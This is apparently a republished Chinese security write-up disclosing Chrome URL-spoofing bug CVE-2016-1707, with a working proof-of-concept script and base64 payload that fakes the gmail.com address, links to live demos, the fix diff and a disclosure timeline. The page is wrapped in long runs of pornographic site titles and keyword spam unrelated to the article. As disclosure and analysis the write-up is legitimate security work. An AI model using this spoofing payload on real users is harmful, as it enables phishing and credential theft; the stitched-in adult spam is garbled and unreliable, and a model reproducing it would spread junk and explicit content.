精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Chrome瀏覽器地址欄欺騙漏洞(CVE-2016-1707)

安全 漏洞
Chrome瀏覽器地址欄欺騙漏洞(CVE-2016-1707),這個漏洞筆者于2016年6月報告給Google,現在把漏洞細節分享給大家。URL Spoofing漏洞可以偽造一個合法的網站地址。攻擊者可以利用這個漏洞對用戶發起網絡釣魚攻擊。

Chrome瀏覽器地址欄欺騙漏洞(CVE-2016-1707),這個漏洞筆者于2016年6月報告給Google,現在把漏洞細節分享給大家。URL Spoofing漏洞可以偽造一個合法的網站地址。攻擊者可以利用這個漏洞對用戶發起網絡釣魚攻擊。

受影響版本:Chrome < v52.0.2743.82,IOS < v10

0x01 漏洞詳情

  1. POC:  
  2. <script>  
  3. payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=" 
  4. function pwned() {  
  5. var t = window.open('https://www.gmail.com/''aaaa');  
  6. t.document.write(atob(payload));  
  7. t.document.write("<h1>Address bar says https://www.gmail.com/ - this is NOT https://www.gmail.com/</h1>");  
  8.  
  9. </script>  
  10. <a href="https://hack.com::/" target="aaaa" onclick="setTimeout('pwned()','500')">click me</a><br> 

那么這個漏洞是如何發生的呢?筆者現在來解讀一下整個代碼的加載過程。首先點擊click me這個鏈接,瀏覽器去打開一個name為aaaa的新窗口,這個頁面去加載“https://hack.com::”,這個地址可以隨便寫。500微秒后運行pwned(),在aaaa窗口打開https://www.gmail.com,當然這個URL可以為空。到現在為止,一切代碼運行都很正常,接下來這段代碼就是觸發漏洞的核心代碼。

base64加密的這段代碼:

  1. base64 payload code:  
  2. <body></body>  
  3. <script>  
  4. var link = document.createElement('a');  
  5. link.href = 'https://gmail.com::' 
  6. document.body.appendChild(link);  
  7. link.click();  
  8. </script> 

接下來這段代開始在aaaa窗口頁面去提交(commit)https://gmail.com::,這是一個很奇妙的事情,https://gmail.com::本是一個無效的地址,如何去被提交呢。在嘗試了多種方法后,筆者發現使用a標簽點擊的方式可以做到(window.open/location則不可以),并且使這個無效地址處在了一個等待狀態(pending status)。此時,實際Chrome是加載了about:blank(已經到了about:blank域),但在處理最后URL地址欄中的顯示時,Chrome卻選擇了處在等待狀態的https://gmail.com:: 作為最后的提交地址,加載后的https://gmail.com::在URL地址欄中會以https://gmail.com這樣的方式呈現,兩個::會被隱藏。此時,整個加載過程完成。一個完美的URL Spoofing漏洞就這樣產生了。

Online demo:

http://xisigr.com/test/spoof/chrome/1.html

http://xisigr.com/test/spoof/chrome/2.html

如果你還沒有升級版本,Chrome < v52.0.2743.82,IOS < v10,那么可以嘗試運行筆者網站上的這兩個DEMO。

0x02如何修復

這個漏洞最關鍵的地方是,Chrome允許在Web頁面加載的時候,提交一個無效的地址所導致。Google也是基于此給出了補丁文件,就是在加載Web頁面的時候不允許提交無效地址,如果檢測到是無效地址,則直接使當前URL為about:blank。

  1. [self optOutScrollsToTopForSubviews];  
  2. // Ensure the URL is as expected (and already reported to the delegate).  
  3. - DCHECK(currentURL == _lastRegisteredRequestURL) //之前只是判斷了當前URL和最后請求的URL是否相同  
  4. + // If |_lastRegisteredRequestURL| is invalid then |currentURL| will be  
  5. + // "about:blank" 
  6. + DCHECK((currentURL == _lastRegisteredRequestURL) ||  
  7. + (!_lastRegisteredRequestURL.is_valid() && //增加判斷是否是一個無效的URL  
  8. + _documentURL.spec() == [url::kAboutBlankURL)](url::kAboutBlankURL)))  
  9. << std::endl  
  10. << "currentURL = [" << currentURL << "]" << std::endl  
  11. << "_lastRegisteredRequestURL = [" << _lastRegisteredRequestURL << "]" 
  12. // This is the point where the document's URL has actually changed, and  
  13. // pending navigation information should be applied to state information.  
  14. [self setDocumentURL:net::GURLWithNSURL([_webView URL])];  
  15. - DCHECK(_documentURL == _lastRegisteredRequestURL);  
  16.  
  17. + if (!_lastRegisteredRequestURL.is_valid() &&  
  18. + _documentURL != _lastRegisteredRequestURL) {  
  19. + // if |_lastRegisteredRequestURL| is an invalid URL, then |_documentURL|  
  20. + // will be "about:blank" 
  21. + [[self sessionController] updatePendingEntry:_documentURL];  
  22. + }  
  23. + DCHECK(_documentURL == _lastRegisteredRequestURL ||  
  24. + (!_lastRegisteredRequestURL.is_valid() &&  
  25. + _documentURL.spec() == url::kAboutBlankURL));  
  26.  
  27. self.webStateImpl->OnNavigationCommitted(_documentURL);  
  28. [self commitPendingNavigationInfo];  
  29. if ([self currentBackForwardListItemHolder]->navigation_type() == 

0x03 披露時間

2016/6/22 報送給Google,https://bugs.chromium.org/

2016/6/22 Google確認漏洞,漏洞級別High

2016/7/14 Google確認獎勵$3000

2016/7/20 Google發布安全公告,CVE-2016-1707

2016/10/2 Google公開漏洞

責任編輯:武曉燕 來源: 紅黑聯盟
相關推薦

2015-12-01 10:43:55

2020-10-21 11:48:22

欺騙漏洞

2009-07-16 14:13:35

Swing地址欄

2011-05-20 17:23:41

Chrome 13

2011-11-04 15:28:49

傲游瀏覽器

2017-01-03 20:13:02

2021-05-27 20:46:22

瀏覽器地址欄谷歌

2023-01-27 11:01:54

谷歌Chrome瀏覽器

2020-10-26 09:56:40

惡意攻擊手機瀏覽器地址欄欺騙

2011-06-16 11:15:04

2010-08-26 17:54:16

微軟

2012-08-05 17:13:47

傲游

2010-08-27 09:47:07

谷歌

2009-12-28 12:16:54

2013-11-27 15:38:14

IE瀏覽器故障

2011-02-21 14:10:50

Chrome

2023-02-02 16:35:36

微軟Edge瀏覽器

2009-12-16 10:04:51

Chrome瀏覽器漏洞

2020-12-09 09:32:03

漏洞黑客瀏覽器

2021-05-27 15:06:41

Chrome瀏覽器Google
點贊
收藏

51CTO技術棧公眾號

成人vr资源| 欧美艳星kaydenkross| 岛国一区二区在线观看| 欧美亚洲激情在线| 蜜桃视频最新网址| 黄色免费大全亚洲| 欧美日韩一区二区在线观看 | 欧美男gay| 3d成人h动漫网站入口| 日本xxxxxxxxxx75| 美女羞羞视频在线观看| 成人精品免费看| 国产精品日韩在线一区| 日干夜干天天干| 小处雏高清一区二区三区| 日韩成人性视频| 天堂网成人在线| 日本在线视频一区二区| 亚洲一区在线视频| 自拍偷拍99| 韩国中文字幕2020精品| 成人涩涩免费视频| 亚洲xxxxx| 中文字幕精品在线观看| 国产日韩综合| 欧美激情一区二区三区在线视频观看| 国产一区第一页| 欧美男gay| 日韩精品电影网| 在线免费看黄色片| 国产aa精品| 欧美日韩一二三| 人妻无码视频一区二区三区| 草美女在线观看| 亚洲乱码中文字幕| 一区二区三区视频在线播放| 免费资源在线观看| 久久久亚洲国产美女国产盗摄| av一本久道久久波多野结衣| 国产精品久久久久久69| 丝瓜av网站精品一区二区| 777午夜精品福利在线观看| 激情视频在线播放| 欧美二区不卡| 欧美成年人视频| 国产尤物在线播放| 99国产精品免费视频观看| 亚洲性猛交xxxxwww| 永久免费看mv网站入口78| 欧美丝袜足交| 日韩久久免费视频| 爱爱的免费视频| 图片婷婷一区| 亚洲人成电影网站| 四虎国产精品成人免费入口| 伊人久久大香线蕉| 亚洲性视频网址| avhd101老司机| 99久久久久国产精品| www.亚洲成人| 青草影院在线观看| 伊人久久大香线蕉综合热线| 高清欧美性猛交xxxx| 亚洲 欧美 视频| 久久福利毛片| 国产欧美一区二区三区四区| 一本大道伊人av久久综合| 激情国产一区二区| 国产精品av一区| 污视频软件在线观看| 久久久久国产免费免费| 午夜欧美性电影| 巨大荫蒂视频欧美另类大| 亚洲精品自拍动漫在线| 99色这里只有精品| 校园春色亚洲色图| 欧美美女视频在线观看| 亚洲欧美日韩中文字幕在线观看| 999精品视频在这里| 日韩av网站电影| 国产三级在线观看完整版| 91偷拍一区二区三区精品| 欧美老女人性视频| 69成人免费视频| 狠狠色狠狠色综合系列| 999热视频在线观看| 性感美女视频一二三| 国产欧美日本一区视频| 国产精品美女在线播放| av最新在线| 欧美色窝79yyyycom| 国产精品91av| 日韩欧美网站| 91av在线影院| 国产女人18毛片水真多| 91亚洲精品久久久蜜桃网站 | 男男一级淫片免费播放| 国产日产精品一区二区三区四区的观看方式 | 亚洲欧美一级二级三级| 琪琪亚洲精品午夜在线| 国产免费高清视频| 久久久久成人黄色影片| 色哺乳xxxxhd奶水米仓惠香| 精品国产免费人成网站| 日韩欧美亚洲一区二区| 久久精品国产亚洲AV熟女| 亚洲最大黄网| 国产精品99久久久久久www| 亚洲AV无码乱码国产精品牛牛| 久久中文娱乐网| 欧美日韩福利在线| 亚洲久草在线| 国产一级揄自揄精品视频| 日韩字幕在线观看| 国产裸体歌舞团一区二区| 青青成人在线| 鲁鲁在线中文| 日韩欧美黄色影院| 艳妇荡乳欲伦69影片| 日韩综合小视频| 精品久久久久久综合日本| 成人日韩欧美| 欧美群妇大交群中文字幕| 无码 人妻 在线 视频| 99热这里只有精品8| 5566av亚洲| 免费高清在线观看| 欧美日韩高清在线| 99国产精品免费| 老**午夜毛片一区二区三区 | 精品成人一区二区三区免费视频| 亚洲在线免费播放| 久久aaaa片一区二区| 欧美hd在线| 国产精品影片在线观看| 国产小视频在线观看| 欧美视频一区二区三区…| 精品1卡二卡三卡四卡老狼| 一区二区三区四区电影| 91精品综合久久久久久五月天| 成人亚洲性情网站www在线观看| 欧美丝袜一区二区| 亚洲一区二区观看| 蜜桃视频一区| 欧美一区免费视频| 成人日韩在线| 中文字幕av一区| 正在播放木下凛凛xv99| 欧美国产日韩精品免费观看| 亚洲国产精品毛片av不卡在线| 深爱激情久久| 国产精品爱啪在线线免费观看| 国产在线一在线二| 欧美三级中文字幕在线观看| 国产精品视频在| 韩国欧美国产1区| 狠狠干视频网站| 成人性生交大片免费看96| 久久青草精品视频免费观看| 午夜成人鲁丝片午夜精品| 午夜精品视频一区| 国产特级黄色录像| 麻豆成人免费电影| 欧美另类videos| 麻豆一区二区| 国产精品久久精品| 91精品久久| 亚洲精品国产美女| 国产一级片av| 亚洲男人天堂av网| 日b视频在线观看| 日韩黄色一级片| 日本黄色播放器| 伦理一区二区| 国产精品小说在线| www在线观看播放免费视频日本| 欧美tk—视频vk| 一级片在线观看免费| 欧美激情一区三区| 亚洲妇女无套内射精| 日韩午夜电影| 一本色道婷婷久久欧美| 亚洲国产aⅴ精品一区二区| 2024亚洲男人天堂| 日本不卡在线| 欧美大片免费久久精品三p| 在线观看亚洲天堂| 亚洲丝袜另类动漫二区| 亚洲国产第一区| 精品一区中文字幕| 精品国产一二三四区| 91视频精品| 欧美一区二区在线| 日韩欧美中文字幕一区二区三区| 国产成人精品视频| 性欧美猛交videos| 亚洲一区999| 亚洲精品无码专区| 欧美日韩黄色影视| 国产一级18片视频| 一区二区三区精品久久久| 免费看污片的网站| 成人自拍视频在线观看| 五月天婷婷亚洲| 中文精品视频| 青青在线免费视频| 色偷偷综合网| 久久婷婷开心| 91九色鹿精品国产综合久久香蕉| 国产精品第100页| www.8ⅹ8ⅹ羞羞漫画在线看| 亚洲午夜精品久久久久久性色| 懂色av蜜臀av粉嫩av分享吧| 欧美久久一二区| 免费又黄又爽又猛大片午夜| 亚洲成人综合网站| 色欲人妻综合网| 国产精品午夜免费| 亚洲av无码一区二区三区人| 成人国产在线观看| 免费黄色av网址| 国产精品综合网| 欧美美女一级片| 免费一级片91| 天天天干夜夜夜操| 日韩专区中文字幕一区二区| 欧美视频在线免费播放| 欧美特黄视频| 乱熟女高潮一区二区在线| 久久一区二区三区电影| 日韩欧美激情一区二区| 亚洲午夜久久| 欧美大陆一区二区| 日韩三级毛片| 精品日本一区二区三区在线观看| 国产伦精品一区二区三区免费优势 | 中文字幕免费观看视频| 91国产精品成人| 无码免费一区二区三区| 欧美色欧美亚洲高清在线视频| 精品国产乱码一区二区| 无码av免费一区二区三区试看 | 中文字幕在线三区| 久久影院模特热| 羞羞电影在线观看www| 欧美裸体男粗大视频在线观看| 国产乱色在线观看| 久热99视频在线观看| 97超碰资源站在线观看| 欧美国产欧美亚洲国产日韩mv天天看完整| v片在线观看| 久久99青青精品免费观看| 污污影院在线观看| 韩国精品美女www爽爽爽视频| 91超碰免费在线| 57pao国产精品一区| 卡通欧美亚洲| 国产精品美女主播| 国产精品一区二区三区av| 3d动漫精品啪啪一区二区三区免费 | 日韩电影在线观看中文字幕| 天堂在线中文字幕| 亚洲性线免费观看视频成熟| av在线电影免费观看| xvideos成人免费中文版| aa在线视频| 欧美一级电影免费在线观看| 日韩天堂在线| 3d动漫啪啪精品一区二区免费| 国偷自产视频一区二区久| 久久精品国产精品国产精品污 | 国产99在线|中文| 开心久久婷婷综合中文字幕| 亚洲free性xxxx护士hd| 国偷自产av一区二区三区| 日韩欧美在线电影| 欧美va天堂在线| 欧美激情成人网| 久久99精品久久久久久| fc2成人免费视频| 国产欧美va欧美不卡在线| 午夜写真片福利电影网| 欧美性猛交xxxx乱大交| 一级特黄录像免费看| 亚洲国产精品成人一区二区| 粉嫩av在线播放| 久久777国产线看观看精品| 欧美香蕉视频| 成人av资源网| 日本大胆欧美| 玩弄中年熟妇正在播放| 久久99久国产精品黄毛片色诱| 国产免费一区二区三区最新6| 国产欧美日韩在线| 国产精品自拍视频一区| 欧美三级电影在线观看| 污污网站在线免费观看| 色黄久久久久久| 在线高清av| 成人av中文| 我不卡神马影院| 欧美日韩一区二区在线免费观看| 国产一区二区在线影院| 精品无码一区二区三区| 亚洲精品日产精品乱码不卡| 少妇一级淫片日本| 日韩精品极品在线观看| 最爽无遮挡行房视频在线| 国产精品99久久久久久白浆小说| 国产欧美啪啪| 在线观看17c| 蜜臀精品一区二区三区在线观看 | 亚洲免费在线看| 中文字字幕在线观看| 日韩成人中文电影| 久草免费在线色站| 亚洲a中文字幕| 日韩电影免费网站| 国产视频一区二区视频| 95精品视频在线| 中文字幕在线字幕中文| 日韩片之四级片| 成人福利片网站| 成人免费视频网| 奇米影视亚洲| www.xxx亚洲| 国产日产亚洲精品系列| 欧美日韩综合一区二区三区| 亚洲国产精品久久久久秋霞不卡| 污影院在线观看| caoporen国产精品| 欧美在线高清| 欧美熟妇另类久久久久久多毛| 成人欧美一区二区三区黑人麻豆| 日韩乱码一区二区三区| 亚洲性无码av在线| 天然素人一区二区视频| 日韩高清av电影| 日本欧洲一区二区| 2017亚洲天堂| 欧美日本一区二区在线观看| 在线免费观看黄色av| 国产精品久久久久一区二区| 国内精品久久久久久久影视简单 | 国产精品影视在线观看| 天海翼在线视频| 欧美一区二区三区播放老司机| 成人免费在线| 国产日韩久久| 国产农村妇女精品一二区| 日本黄色网址大全| 色婷婷精品久久二区二区蜜臂av | 欧美在线免费视频| 国产精品手机在线播放| 日韩在线第三页| ...av二区三区久久精品| 精品人妻久久久久一区二区三区 | 成人在线一区二区三区| 国产亚洲精品码| 日韩va亚洲va欧洲va国产| 成人爱爱网址| 在线一区亚洲| 国产成人aaa| av大全在线观看| 中文字幕亚洲欧美在线| 国产精品久一| 无码专区aaaaaa免费视频| 久久女同互慰一区二区三区| 日韩乱码一区二区三区| 欧美成人久久久| 久久男人av| 小泽玛利亚视频在线观看| 一区二区三区四区国产精品| 天堂在线视频免费观看| 欧美在线影院在线视频| 久久精品高清| 午夜福利三级理论电影| 色综合色综合色综合色综合色综合| 在线免费看av| 国产精品二区三区四区| 日韩精品成人一区二区在线| 天海翼在线视频| 亚洲开心激情网| 成人日韩视频| 欧美黄色免费影院| 亚洲欧美激情在线| 男人天堂资源在线| 亚洲一区中文字幕在线观看| 国产一区二区三区成人欧美日韩在线观看 | 国产精品区一区二区三| 亚洲精品久久久久久动漫器材一区 | 婷婷精品国产一区二区三区日韩 | 日本黄色动态图| 欧美色老头old∨ideo| 多野结衣av一区| 欧美爱爱视频网站| 久久久久国产一区二区三区四区| 超碰福利在线观看| 国产精品毛片a∨一区二区三区|国 | 熟女性饥渴一区二区三区|